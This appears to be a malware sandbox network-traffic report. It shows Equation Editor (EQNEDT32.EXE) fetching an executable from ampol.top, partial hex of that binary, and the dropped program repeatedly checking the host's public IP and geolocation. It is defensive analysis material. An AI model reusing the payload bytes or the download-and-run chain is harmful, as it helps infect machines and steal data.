                    Jul 1, 2024 20:06:16.461544037 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:16 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: 71e504bd071e8c3200864705fa3e0c1d
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.2249167193.122.6.168803244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    Jul 1, 2024 20:06:17.267494917 CEST127OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 1, 2024 20:06:17.935688019 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:17 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a123f54bf969e7297934ce1f64f208ad
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:18.147530079 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:17 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a123f54bf969e7297934ce1f64f208ad
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.2249169193.122.130.0803244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    Jul 1, 2024 20:06:18.697963953 CEST127OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 1, 2024 20:06:19.171230078 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:19 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: ff86fa62ee8c897842301122a24b821d
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.2249171158.101.44.242803244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    Jul 1, 2024 20:06:19.857837915 CEST151OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 1, 2024 20:06:21.475548983 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:21 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: 31e38d09acda3244b70dd117d827841f
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.2249173158.101.44.242803244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    Jul 1, 2024 20:06:22.146749020 CEST151OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 1, 2024 20:06:22.730767965 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:22 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: ccc626da05dafa2d1266beafd6c908d1
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:22.948739052 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:22 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: ccc626da05dafa2d1266beafd6c908d1
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.2249175193.122.130.0803244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    Jul 1, 2024 20:06:23.467356920 CEST151OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 1, 2024 20:06:23.963009119 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:23 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: fb0cc70ac144307d5529684c02621d12
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:24.175595045 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:23 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: fb0cc70ac144307d5529684c02621d12
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.2249177193.122.130.0803244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    Jul 1, 2024 20:06:24.681402922 CEST151OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 1, 2024 20:06:25.161417961 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:25 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a2ea309e2ef9afb19354f0e917b2de2c
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:25.375566006 CEST320INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:25 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a2ea309e2ef9afb19354f0e917b2de2c
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.2249163104.21.53.2034431804C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampBytes transferredDirectionData
                    2024-07-01 18:06:08 UTC315OUTGET /FcdBUj68lnCbMtB.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: ampol.top
                    Connection: Keep-Alive
                    2024-07-01 18:06:08 UTC739INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:08 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 554504
                    Connection: close
                    Last-Modified: Mon, 01 Jul 2024 15:40:22 GMT
                    ETag: "6682cde6-87608"
                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                    Cache-Control: max-age=315360000
                    CF-Cache-Status: HIT
                    Age: 6345
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7G4dorEJshtmnuTRvkFoBn7dNpaekvCms7H0CpUpilZTv8dAa9s%2BvQR%2BbRYMoBO%2BlV4oXDJRhxvRj%2BeD06tcN7KkWT%2BQ1TgpWBpo4IUCsWXL0iOOkRiMYFTrz4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c854055ca60f9f-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:08 UTC630INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 c5 82 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 18 08 00 00 20 00 00 00 00 00 00 d6 34 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 08 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 08 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0 4 @@ @
                    2024-07-01 18:06:08 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii:
                    2024-07-01 18:06:08 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 34 08 00 00 00 00 00 48 00 00 00 02 00 05 00 80 5f 00 00 4c 3a 00 00 03 00 00 00 38 00 00 06 cc 99 00 00 b8 9a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 02 73 14 00 00 0a 7d 05 00 00 04 02 73 15 00 00 0a 7d 06 00 00 04 02 17 7d 07 00 00 04 02 28 16 00 00 0a 02 28 17 00 00 06 2a 00 13 30 03 00 ac 00 00 00 00 00 00 00 02 7b 05 00 00 04 02 7b 0d 00 00 04 6f 17 00 00 0a 28 18 00 00 0a 6f 19 00 00 0a 02 7b 05 00 00 04 6f 1a 00 00 0a 18 33 2f 02 02 7b 06 00 00 04 6f 1b 00 00 0a 7d 04 00 00 04 02 02 02 7b 04 00 00 04 28 04 00 00
                    Data Ascii: 4H_L:8s}s}}((*0{{o(o{o3/{o}{(
                    2024-07-01 18:06:08 UTC1369INData Raw: 0d 00 00 04 6f 17 00 00 0a 1f 09 0a 12 00 28 21 00 00 0a 28 22 00 00 0a 6f 1f 00 00 0a 02 7b 21 00 00 04 25 6f 17 00 00 0a 1f 09 0a 12 00 28 21 00 00 0a 28 22 00 00 0a 6f 1f 00 00 0a 2a 00 00 13 30 03 00 44 00 00 00 01 00 00 11 02 7b 0d 00 00 04 02 7b 0d 00 00 04 6f 17 00 00 0a 16 0a 12 00 28 21 00 00 0a 28 22 00 00 0a 6f 1f 00 00 0a 02 7b 21 00 00 04 25 6f 17 00 00 0a 16 0a 12 00 28 21 00 00 0a 28 22 00 00 0a 6f 1f 00 00 0a 2a 13 30 03 00 c6 00 00 00 00 00 00 00 02 7b 05 00 00 04 02 7b 0d 00 00 04 6f 17 00 00 0a 28 18 00 00 0a 6f 19 00 00 0a 02 7b 05 00 00 04 6f 1a 00 00 0a 18 33 2f 02 02 7b 06 00 00 04 6f 1b 00 00 0a 7d 04 00 00 04 02 02 02 7b 04 00 00 04 28 04 00 00 06 7d 03 00 00 04 02 02 7b 03 00 00 04 28 03 00 00 06 02 7b 0d 00 00 04 6f 1c 00 00 0a
                    Data Ascii: o(!("o{!%o(!("o*0D{{o(!("o{!%o(!("o*0{{o(o{o3/{o}{(}{({o
                    2024-07-01 18:06:08 UTC1369INData Raw: 13 00 00 04 02 73 2e 00 00 0a 7d 14 00 00 04 02 73 2e 00 00 0a 7d 15 00 00 04 02 73 2e 00 00 0a 7d 16 00 00 04 02 73 2e 00 00 0a 7d 17 00 00 04 02 73 2e 00 00 0a 7d 18 00 00 04 02 73 2e 00 00 0a 7d 19 00 00 04 02 73 2e 00 00 0a 7d 1a 00 00 04 02 73 2e 00 00 0a 7d 1b 00 00 04 02 73 30 00 00 0a 7d 1c 00 00 04 02 73 31 00 00 0a 7d 1d 00 00 04 02 73 30 00 00 0a 7d 1e 00 00 04 02 73 30 00 00 0a 7d 1f 00 00 04 02 73 30 00 00 0a 7d 20 00 00 04 02 73 2f 00 00 0a 7d 21 00 00 04 02 7b 1c 00 00 04 6f 32 00 00 0a 02 7b 1d 00 00 04 6f 32 00 00 0a 02 7b 1e 00 00 04 6f 32 00 00 0a 02 7b 1f 00 00 04 6f 32 00 00 0a 02 7b 20 00 00 04 6f 32 00 00 0a 02 28 32 00 00 0a 02 7b 09 00 00 04 1e 1d 73 33 00 00 0a 6f 34 00 00 0a 02 7b 09 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00
                    Data Ascii: s.}s.}s.}s.}s.}s.}s.}s.}s0}s1}s0}s0}s0} s/}!{o2{o2{o2{o2{ o2(2{s3o4{s5o6
                    2024-07-01 18:06:08 UTC1369INData Raw: 02 7b 11 00 00 04 1e 6f 3a 00 00 0a 02 7b 11 00 00 04 72 b7 00 00 70 6f 1f 00 00 0a 02 7b 11 00 00 04 17 6f 3b 00 00 0a 02 7b 11 00 00 04 02 fe 06 0a 00 00 06 73 3c 00 00 0a 6f 3d 00 00 0a 02 7b 12 00 00 04 1e 20 af 00 00 00 73 33 00 00 0a 6f 34 00 00 0a 02 7b 12 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00 00 0a 02 7b 12 00 00 04 72 bb 00 00 70 6f 37 00 00 0a 02 7b 12 00 00 04 1f 5b 1f 51 73 38 00 00 0a 6f 39 00 00 0a 02 7b 12 00 00 04 1f 09 6f 3a 00 00 0a 02 7b 12 00 00 04 72 cb 00 00 70 6f 1f 00 00 0a 02 7b 12 00 00 04 17 6f 3b 00 00 0a 02 7b 12 00 00 04 02 fe 06 0b 00 00 06 73 3c 00 00 0a 6f 3d 00 00 0a 02 7b 13 00 00 04 1f 73 20 af 00 00 00 73 33 00 00 0a 6f 34 00 00 0a 02 7b 13 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00 00 0a 02 7b 13 00 00 04 72
                    Data Ascii: {o:{rpo{o;{s<o={ s3o4{s5o6{rpo7{[Qs8o9{o:{rpo{o;{s<o={s s3o4{s5o6{r
                    2024-07-01 18:06:08 UTC1369INData Raw: 00 00 0a 02 7b 1b 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00 00 0a 02 7b 1b 00 00 04 72 5b 01 00 70 6f 37 00 00 0a 02 7b 1b 00 00 04 20 93 00 00 00 1f 51 73 38 00 00 0a 6f 39 00 00 0a 02 7b 1b 00 00 04 1f 12 6f 3a 00 00 0a 02 7b 1b 00 00 04 72 67 01 00 70 6f 1f 00 00 0a 02 7b 1b 00 00 04 17 6f 3b 00 00 0a 02 7b 1b 00 00 04 02 fe 06 15 00 00 06 73 3c 00 00 0a 6f 3d 00 00 0a 02 7b 1c 00 00 04 6f 3e 00 00 0a 02 7b 15 00 00 04 6f 3f 00 00 0a 02 7b 1c 00 00 04 6f 3e 00 00 0a 02 7b 1a 00 00 04 6f 3f 00 00 0a 02 7b 1c 00 00 04 6f 3e 00 00 0a 02 7b 0b 00 00 04 6f 3f 00 00 0a 02 7b 1c 00 00 04 20 80 01 00 00 1f 69 73 33 00 00 0a 6f 34 00 00 0a 02 7b 1c 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00 00 0a 02 7b 1c 00 00 04 72 71 01 00 70 6f 37 00 00 0a 02 7b 1c 00
                    Data Ascii: {s5o6{r[po7{ Qs8o9{o:{rgpo{o;{s<o={o>{o?{o>{o?{o>{o?{ is3o4{s5o6{rqpo7{
                    2024-07-01 18:06:08 UTC1369INData Raw: 00 00 1d 73 33 00 00 0a 6f 34 00 00 0a 02 7b 21 00 00 04 1e 1d 1e 1d 73 35 00 00 0a 6f 36 00 00 0a 02 7b 21 00 00 04 72 e5 01 00 70 6f 37 00 00 0a 02 7b 21 00 00 04 20 71 01 00 00 1f 26 73 38 00 00 0a 6f 39 00 00 0a 02 7b 21 00 00 04 1f 18 6f 3a 00 00 0a 02 22 00 00 80 41 22 00 00 f8 41 73 4c 00 00 0a 28 4d 00 00 0a 02 17 28 4e 00 00 0a 02 20 3b 03 00 00 20 c0 01 00 00 73 38 00 00 0a 28 4f 00 00 0a 02 28 3e 00 00 0a 02 7b 21 00 00 04 6f 3f 00 00 0a 02 28 3e 00 00 0a 02 7b 20 00 00 04 6f 3f 00 00 0a 02 28 3e 00 00 0a 02 7b 1f 00 00 04 6f 3f 00 00 0a 02 28 3e 00 00 0a 02 7b 1e 00 00 04 6f 3f 00 00 0a 02 28 3e 00 00 0a 02 7b 1c 00 00 04 6f 3f 00 00 0a 02 28 3e 00 00 0a 02 7b 0d 00 00 04 6f 3f 00 00 0a 02 06 72 f7 01 00 70 6f 50 00 00 0a 74 37 00 00 01 28 51
                    Data Ascii: s3o4{!s5o6{!rpo7{! q&s8o9{!o:"A"AsL(M(N ; s8(O(>{!o?(>{ o?(>{o?(>{o?(>{o?(>{o?rpoPt7(Q
                    2024-07-01 18:06:08 UTC1369INData Raw: 02 7b 2d 00 00 04 6f 17 00 00 0a 6f 62 00 00 0a 0a 02 7b 2d 00 00 04 06 6f 5c 00 00 0a 2a aa 02 7b 24 00 00 04 2c 13 04 6f 63 00 00 0a 02 7b 24 00 00 04 6f 63 00 00 0a 2e 01 2a 02 02 7b 2d 00 00 04 04 28 1f 00 00 06 2a 00 00 13 30 03 00 22 01 00 00 05 00 00 11 14 0a 16 0b 14 0c 14 0d 04 6f 63 00 00 0a 13 04 11 04 20 a1 00 00 00 30 2e 11 04 1f 10 30 0d 11 04 1e 2e 5f 11 04 1f 10 2e 59 2b 58 11 04 1f 25 59 19 36 4f 11 04 1f 2e 2e 49 11 04 20 a0 00 00 00 59 17 36 3e 2b 3d 11 04 20 c0 00 00 00 30 16 11 04 20 ba 00 00 00 2e 2a 11 04 20 bf 00 00 00 59 17 36 1f 2b 1e 11 04 20 db 00 00 00 59 1a 36 12 11 04 20 e2 00 00 00 2e 09 11 04 20 00 00 01 00 33 01 2a 03 6f 17 00 00 0a 0a 03 06 6f 64 00 00 0a 0b 07 16 3f 87 00 00 00 03 6f 65 00 00 0a 07 6f 66 00 00 0a 0c 03
                    Data Ascii: {-oob{-o\*{$,oc{$oc.*{-(*0"oc 0.0._.Y+X%Y6O..I Y6>+= 0 .* Y6+ Y6 . 3*ood?oeof
                    2024-07-01 18:06:08 UTC1369INData Raw: 2a 00 00 04 20 95 00 00 00 20 e5 00 00 00 73 33 00 00 0a 6f 34 00 00 0a 02 7b 2a 00 00 04 1e 16 1e 16 73 35 00 00 0a 6f 36 00 00 0a 02 7b 2a 00 00 04 72 9b 04 00 70 6f 37 00 00 0a 02 7b 2a 00 00 04 16 1f 20 73 38 00 00 0a 6f 39 00 00 0a 02 7b 2a 00 00 04 1a 6f 3a 00 00 0a 02 7b 2b 00 00 04 17 6f 74 00 00 0a 02 7b 2b 00 00 04 1f 20 20 49 01 00 00 73 33 00 00 0a 6f 34 00 00 0a 02 7b 2b 00 00 04 1e 16 1e 16 73 35 00 00 0a 6f 36 00 00 0a 02 7b 2b 00 00 04 72 a9 04 00 70 6f 37 00 00 0a 02 7b 2b 00 00 04 1f 51 1f 20 73 38 00 00 0a 6f 39 00 00 0a 02 7b 2b 00 00 04 1b 6f 3a 00 00 0a 02 7b 2b 00 00 04 72 b7 04 00 70 6f 1f 00 00 0a 02 7b 2c 00 00 04 17 6f 74 00 00 0a 02 7b 2c 00 00 04 20 95 00 00 00 20 49 01 00 00 73 33 00 00 0a 6f 34 00 00 0a 02 7b 2c 00 00 04 1e
                    Data Ascii: * s3o4{*s5o6{*rpo7{* s8o9{*o:{+ot{+ Is3o4{+s5o6{+rpo7{+Q s8o9{+o:{+rpo{,ot{, Is3o4{,


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.2249165188.114.96.34433244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    2024-07-01 18:06:16 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-01 18:06:16 UTC710INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:16 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13137
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jEo2%2BvwMlARsNxjgDunSA8bcswE1d0VPkpwJJTHt8lcwE%2BwIgkAfUJKYG0cVamXvwlTVx1yJ218RrV5%2FNvVXEN12a1az8VVsodn3Y6cIVToKmsqO%2B1lK7qveyG20ANhPX9194i%2FS"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c854374cbcc3f0-EWR
                    alt-svc: h3=":443"; ma=86400
